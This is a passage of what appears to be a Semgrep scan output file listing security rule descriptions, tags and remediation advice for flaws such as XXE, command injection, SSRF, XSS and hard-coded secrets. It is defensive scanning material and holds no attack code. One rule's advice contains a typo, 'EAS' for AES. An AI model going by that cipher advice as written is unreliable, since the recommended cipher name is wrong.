parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party."},"helpUri":"https://semgrep.dev/r/php.lang.security.xml-external-entities-unsafe-entity-loader.xml-external-entities-unsafe-entity-loader","id":"php.lang.security.xml-external-entities-unsafe-entity-loader.xml-external-entities-unsafe-entity-loader","name":"php.lang.security.xml-external-entities-unsafe-entity-loader.xml-external-entities-unsafe-entity-loader","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.xml-external-entities-unsafe-entity-loader.xml-external-entities-unsafe-entity-loader"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Auditing is not enabled for DocumentDB. To ensure that you are able to accurately audit the usage of your DocumentDB cluster, you should enable auditing and export logs to CloudWatch."},"help":{"markdown":"Auditing is not enabled for DocumentDB. To ensure that you are able to accurately audit the usage of your DocumentDB cluster, you should enable auditing and export logs to CloudWatch.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-documentdb-auditing-disabled.aws-documentdb-auditing-disabled)\n - [https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/docdb_cluster#enabled_cloudwatch_logs_exports](https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/docdb_cluster#enabled_cloudwatch_logs_exports)\n - [https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures/](https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures/)\n","text":"Auditing is not enabled for DocumentDB. To ensure that you are able to accurately audit the usage of your DocumentDB cluster, you should enable auditing and export logs to CloudWatch."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-documentdb-auditing-disabled.aws-documentdb-auditing-disabled","id":"terraform.aws.security.aws-documentdb-auditing-disabled.aws-documentdb-auditing-disabled","name":"terraform.aws.security.aws-documentdb-auditing-disabled.aws-documentdb-auditing-disabled","properties":{"precision":"very-high","tags":["CWE-778: Insufficient Logging","MEDIUM CONFIDENCE","OWASP-A09:2021 - Security Logging and Monitoring Failures","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-documentdb-auditing-disabled.aws-documentdb-auditing-disabled"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Using variable interpolation `${{...}}` with `github` context data in a `actions/github-script`'s `script:` step could allow an attacker to inject their own code into the runner. This would allow them to steal secrets and code. `github` context data can have arbitrary user input and should be treated as untrusted. Instead, use an intermediate environment variable with `env:` to store the data and use the environment variable in the `run:` script. Be sure to use double-quotes the environment variable, like this: \"$ENVVAR\"."},"help":{"markdown":"Using variable interpolation `${{...}}` with `github` context data in a `actions/github-script`'s `script:` step could allow an attacker to inject their own code into the runner. This would allow them to steal secrets and code. `github` context data can have arbitrary user input and should be treated as untrusted. Instead, use an intermediate environment variable with `env:` to store the data and use the environment variable in the `run:` script. Be sure to use double-quotes the environment variable, like this: \"$ENVVAR\".\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/yaml.github-actions.security.github-script-injection.github-script-injection)\n - [https://docs.github.com/en/actions/learn-github-actions/security-hardening-for-github-actions#understanding-the-risk-of-script-injections](https://docs.github.com/en/actions/learn-github-actions/security-hardening-for-github-actions#understanding-the-risk-of-script-injections)\n - [https://securitylab.github.com/research/github-actions-untrusted-input/](https://securitylab.github.com/research/github-actions-untrusted-input/)\n - [https://github.com/actions/github-script](https://github.com/actions/github-script)\n","text":"Using variable interpolation `${{...}}` with `github` context data in a `actions/github-script`'s `script:` step could allow an attacker to inject their own code into the runner. This would allow them to steal secrets and code. `github` context data can have arbitrary user input and should be treated as untrusted. Instead, use an intermediate environment variable with `env:` to store the data and use the environment variable in the `run:` script. Be sure to use double-quotes the environment variable, like this: \"$ENVVAR\"."},"helpUri":"https://semgrep.dev/r/yaml.github-actions.security.github-script-injection.github-script-injection","id":"yaml.github-actions.security.github-script-injection.github-script-injection","name":"yaml.github-actions.security.github-script-injection.github-script-injection","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: yaml.github-actions.security.github-script-injection.github-script-injection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.mongo.java-mongo-hardcoded-secret.java-mongo-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/java.mongo.java-mongo-hardcoded-secret.java-mongo-hardcoded-secret","id":"java.mongo.java-mongo-hardcoded-secret.java-mongo-hardcoded-secret","name":"java.mongo.java-mongo-hardcoded-secret.java-mongo-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.mongo.java-mongo-hardcoded-secret.java-mongo-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found a formatted template string passed to 'template.HTML()'. 'template.HTML()' does not escape contents. Be absolutely sure there is no user-controlled data in this template. If user data can reach this template, you may have a XSS vulnerability."},"help":{"markdown":"Found a formatted template string passed to 'template.HTML()'. 'template.HTML()' does not escape contents. Be absolutely sure there is no user-controlled data in this template. If user data can reach this template, you may have a XSS vulnerability.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.net.formatted-template-string.formatted-template-string)\n - [https://golang.org/pkg/html/template/#HTML](https://golang.org/pkg/html/template/#HTML)\n","text":"Found a formatted template string passed to 'template.HTML()'. 'template.HTML()' does not escape contents. Be absolutely sure there is no user-controlled data in this template. If user data can reach this template, you may have a XSS vulnerability."},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.net.formatted-template-string.formatted-template-string","id":"go.lang.security.audit.net.formatted-template-string.formatted-template-string","name":"go.lang.security.audit.net.formatted-template-string.formatted-template-string","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.net.formatted-template-string.formatted-template-string"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.os.tainted-os-command-stdlib-secure-if-array.tainted-os-command-stdlib-secure-if-array)\n - [https://docs.python.org/3/library/os.html](https://docs.python.org/3/library/os.html)\n - [https://docs.python.org/3/library/subprocess.html#subprocess.Popen](https://docs.python.org/3/library/subprocess.html#subprocess.Popen)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n - [https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html](https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"helpUri":"https://semgrep.dev/r/python.lang.os.tainted-os-command-stdlib-secure-if-array.tainted-os-command-stdlib-secure-if-array","id":"python.lang.os.tainted-os-command-stdlib-secure-if-array.tainted-os-command-stdlib-secure-if-array","name":"python.lang.os.tainted-os-command-stdlib-secure-if-array.tainted-os-command-stdlib-secure-if-array","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.os.tainted-os-command-stdlib-secure-if-array.tainted-os-command-stdlib-secure-if-array"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks through parameter entities by configuring $FACTORY with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$PARSER.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks through parameter entities by configuring $FACTORY with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$PARSER.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.xxe.xmlreader-xxe-parameter-entities.xmlreader-xxe-parameter-entities)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/semgrep/java-xxe-research](https://github.com/semgrep/java-xxe-research)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks through parameter entities by configuring $FACTORY with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$PARSER.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/java.lang.security.xxe.xmlreader-xxe-parameter-entities.xmlreader-xxe-parameter-entities","id":"java.lang.security.xxe.xmlreader-xxe-parameter-entities.xmlreader-xxe-parameter-entities","name":"java.lang.security.xxe.xmlreader-xxe-parameter-entities.xmlreader-xxe-parameter-entities","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.xxe.xmlreader-xxe-parameter-entities.xmlreader-xxe-parameter-entities"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"IDEA (International Data Encryption Algorithm) is a block cipher created in 1991. It is an optional component of the OpenPGP standard. This cipher is susceptible to attacks when using weak keys. It is recommended that you do not use this cipher for new applications. Use a strong symmetric cipher such as EAS instead. With the `cryptography` package it is recommended to use `Fernet` which is a secure implementation of AES in CBC mode with a 128-bit key. Alternatively, keep using the `Cipher` class from the hazmat primitives but use the AES algorithm instead."},"help":{"markdown":"IDEA (International Data Encryption Algorithm) is a block cipher created in 1991. It is an optional component of the OpenPGP standard. This cipher is susceptible to attacks when using weak keys. It is recommended that you do not use this cipher for new applications. Use a strong symmetric cipher such as EAS instead. With the `cryptography` package it is recommended to use `Fernet` which is a secure implementation of AES in CBC mode with a 128-bit key. Alternatively, keep using the `Cipher` class from the hazmat primitives but use the AES algorithm instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.cryptography.security.insecure-cipher-algorithms.insecure-cipher-algorithm-idea)\n - [https://tools.ietf.org/html/rfc5469](https://tools.ietf.org/html/rfc5469)\n - [https://cryptography.io/en/latest/hazmat/primitives/symmetric-encryption/#cryptography.hazmat.primitives.ciphers.algorithms.IDEA](https://cryptography.io/en/latest/hazmat/primitives/symmetric-encryption/#cryptography.hazmat.primitives.ciphers.algorithms.IDEA)\n","text":"IDEA (International Data Encryption Algorithm) is a block cipher created in 1991. It is an optional component of the OpenPGP standard. This cipher is susceptible to attacks when using weak keys. It is recommended that you do not use this cipher for new applications. Use a strong symmetric cipher such as EAS instead. With the `cryptography` package it is recommended to use `Fernet` which is a secure implementation of AES in CBC mode with a 128-bit key. Alternatively, keep using the `Cipher` class from the hazmat primitives but use the AES algorithm instead."},"helpUri":"https://semgrep.dev/r/python.cryptography.security.insecure-cipher-algorithms.insecure-cipher-algorithm-idea","id":"python.cryptography.security.insecure-cipher-algorithms.insecure-cipher-algorithm-idea","name":"python.cryptography.security.insecure-cipher-algorithms.insecure-cipher-algorithm-idea","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.cryptography.security.insecure-cipher-algorithms.insecure-cipher-algorithm-idea"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `True` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag to False on a case-by-case basis only when necessary."},"help":{"markdown":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `True` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag to False on a case-by-case basis only when necessary.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.web.flask-cookie-httponly-missing.flask-cookie-httponly-missing)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `True` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag to False on a case-by-case basis only when necessary."},"helpUri":"https://semgrep.dev/r/python.flask.web.flask-cookie-httponly-missing.flask-cookie-httponly-missing","id":"python.flask.web.flask-cookie-httponly-missing.flask-cookie-httponly-missing","name":"python.flask.web.flask-cookie-httponly-missing.flask-cookie-httponly-missing","properties":{"precision":"very-high","tags":["CWE-1004: Sensitive Cookie Without 'HttpOnly' Flag","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.web.flask-cookie-httponly-missing.flask-cookie-httponly-missing"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"AWS Session Token detected"},"help":{"markdown":"AWS Session Token detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-aws-session-token.detected-aws-session-token)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"AWS Session Token detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-aws-session-token.detected-aws-session-token","id":"generic.secrets.security.detected-aws-session-token.detected-aws-session-token","name":"generic.secrets.security.detected-aws-session-token.detected-aws-session-token","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-aws-session-token.detected-aws-session-token"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.secrets.mysql.mysql-empty-password.mysql-empty-password)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/go.secrets.mysql.mysql-empty-password.mysql-empty-password","id":"go.secrets.mysql.mysql-empty-password.mysql-empty-password","name":"go.secrets.mysql.mysql-empty-password.mysql-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: go.secrets.mysql.mysql-empty-password.mysql-empty-password"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"This expression points to memory that has been freed. This can lead to a segmentation fault or memory corruption."},"help":{"markdown":"This expression points to memory that has been freed. This can lead to a segmentation fault or memory corruption.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.use-after-free.local-variable-new-delete.local-variable-new-delete)\n - [https://wiki.sei.cmu.edu/confluence/display/c/MEM30-C.+Do+not+access+freed+memory](https://wiki.sei.cmu.edu/confluence/display/c/MEM30-C.+Do+not+access+freed+memory)\n - [https://wiki.sei.cmu.edu/confluence/display/cplusplus/EXP54-CPP.+Do+not+access+an+object+outside+of+its+lifetime](https://wiki.sei.cmu.edu/confluence/display/cplusplus/EXP54-CPP.+Do+not+access+an+object+outside+of+its+lifetime)\n","text":"This expression points to memory that has been freed. This can lead to a segmentation fault or memory corruption."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.use-after-free.local-variable-new-delete.local-variable-new-delete","id":"cpp.lang.security.use-after-free.local-variable-new-delete.local-variable-new-delete","name":"cpp.lang.security.use-after-free.local-variable-new-delete.local-variable-new-delete","properties":{"precision":"very-high","tags":["CWE-416: Use After Free","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.use-after-free.local-variable-new-delete.local-variable-new-delete"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application builds a URL using user-controlled input which can lead to an open redirect vulnerability. An attacker can manipulate the URL and redirect users to an arbitrary domain. Open redirect vulnerabilities can lead to issues such as Cross-site scripting (XSS) or redirecting to a malicious domain for activities such as phishing to capture users' credentials. To prevent this vulnerability perform strict input validation of the domain against an allowlist of approved domains. Notify a user in your application that they are leaving the website. Display a domain where they are redirected to the user. A user can then either accept or deny the redirect to an untrusted site."},"help":{"markdown":"The application builds a URL using user-controlled input which can lead to an open redirect vulnerability. An attacker can manipulate the URL and redirect users to an arbitrary domain. Open redirect vulnerabilities can lead to issues such as Cross-site scripting (XSS) or redirecting to a malicious domain for activities such as phishing to capture users' credentials. To prevent this vulnerability perform strict input validation of the domain against an allowlist of approved domains. Notify a user in your application that they are leaving the website. Display a domain where they are redirected to the user. A user can then either accept or deny the redirect to an untrusted site.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.browser.open-redirect-pathname.open-redirect-pathname)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html)\n","text":"The application builds a URL using user-controlled input which can lead to an open redirect vulnerability. An attacker can manipulate the URL and redirect users to an arbitrary domain. Open redirect vulnerabilities can lead to issues such as Cross-site scripting (XSS) or redirecting to a malicious domain for activities such as phishing to capture users' credentials. To prevent this vulnerability perform strict input validation of the domain against an allowlist of approved domains. Notify a user in your application that they are leaving the website. Display a domain where they are redirected to the user. A user can then either accept or deny the redirect to an untrusted site."},"helpUri":"https://semgrep.dev/r/javascript.browser.open-redirect-pathname.open-redirect-pathname","id":"javascript.browser.open-redirect-pathname.open-redirect-pathname","name":"javascript.browser.open-redirect-pathname.open-redirect-pathname","properties":{"precision":"very-high","tags":["CWE-601: URL Redirection to Untrusted Site ('Open Redirect')","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.browser.open-redirect-pathname.open-redirect-pathname"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"`$POLICY` is missing a `condition` block which scopes users of this policy to specific GitHub repositories. Without this, `$POLICY` is open to all users on GitHub. Add a `condition` block on the variable `token.actions.githubusercontent.com:sub` which scopes it to prevent this."},"help":{"markdown":"`$POLICY` is missing a `condition` block which scopes users of this policy to specific GitHub repositories. Without this, `$POLICY` is open to all users on GitHub. Add a `condition` block on the variable `token.actions.githubusercontent.com:sub` which scopes it to prevent this.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.unrestricted-github-oidc-policy.unrestricted-github-oidc-policy)\n - [https://docs.github.com/en/actions/deployment/security-hardening-your-deployments/configuring-openid-connect-in-amazon-web-services#configuring-the-role-and-trust-policy](https://docs.github.com/en/actions/deployment/security-hardening-your-deployments/configuring-openid-connect-in-amazon-web-services#configuring-the-role-and-trust-policy)\n - [https://dagrz.com/writing/aws-security/hacking-github-aws-oidc/](https://dagrz.com/writing/aws-security/hacking-github-aws-oidc/)\n","text":"`$POLICY` is missing a `condition` block which scopes users of this policy to specific GitHub repositories. Without this, `$POLICY` is open to all users on GitHub. Add a `condition` block on the variable `token.actions.githubusercontent.com:sub` which scopes it to prevent this."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.unrestricted-github-oidc-policy.unrestricted-github-oidc-policy","id":"terraform.aws.security.unrestricted-github-oidc-policy.unrestricted-github-oidc-policy","name":"terraform.aws.security.unrestricted-github-oidc-policy.unrestricted-github-oidc-policy","properties":{"precision":"very-high","tags":["CWE-284: Improper Access Control","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.unrestricted-github-oidc-policy.unrestricted-github-oidc-policy"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A parameter being passed directly into `url` most likely lead to SSRF. This could allow an attacker to send data to their own server, potentially exposing sensitive data sent with this request. They could also probe internal servers or other resources that the server running this code can access. Do not allow arbitrary hosts. Instead, create an allowlist for approved hosts, or hardcode the correct host."},"help":{"markdown":"A parameter being passed directly into `url` most likely lead to SSRF. This could allow an attacker to send data to their own server, potentially exposing sensitive data sent with this request. They could also probe internal servers or other resources that the server running this code can access. Do not allow arbitrary hosts. Instead, create an allowlist for approved hosts, or hardcode the correct host.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/scala.lang.security.audit.dispatch-ssrf.dispatch-ssrf)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html)\n - [https://dispatchhttp.org/Dispatch.html](https://dispatchhttp.org/Dispatch.html)\n","text":"A parameter being passed directly into `url` most likely lead to SSRF. This could allow an attacker to send data to their own server, potentially exposing sensitive data sent with this request. They could also probe internal servers or other resources that the server running this code can access. Do not allow arbitrary hosts. Instead, create an allowlist for approved hosts, or hardcode the correct host."},"helpUri":"https://semgrep.dev/r/scala.lang.security.audit.dispatch-ssrf.dispatch-ssrf","id":"scala.lang.security.audit.dispatch-ssrf.dispatch-ssrf","name":"scala.lang.security.audit.dispatch-ssrf.dispatch-ssrf","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","LOW CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: scala.lang.security.audit.dispatch-ssrf.dispatch-ssrf"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Avoid using insecure deserialization library, backed by `pickle`, `_pickle`, `cpickle`, `dill`, `shelve`, or `yaml`, which are known to lead to remote code execution vulnerabilities."},"help":{"markdown":"Avoid using insecure deserialization library, backed by `pickle`, `_pickle`, `cpickle`, `dill`, `shelve`, or `yaml`, which are known to lead to remote code execution vulnerabilities.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.audit.avoid-insecure-deserialization.avoid-insecure-deserialization)\n 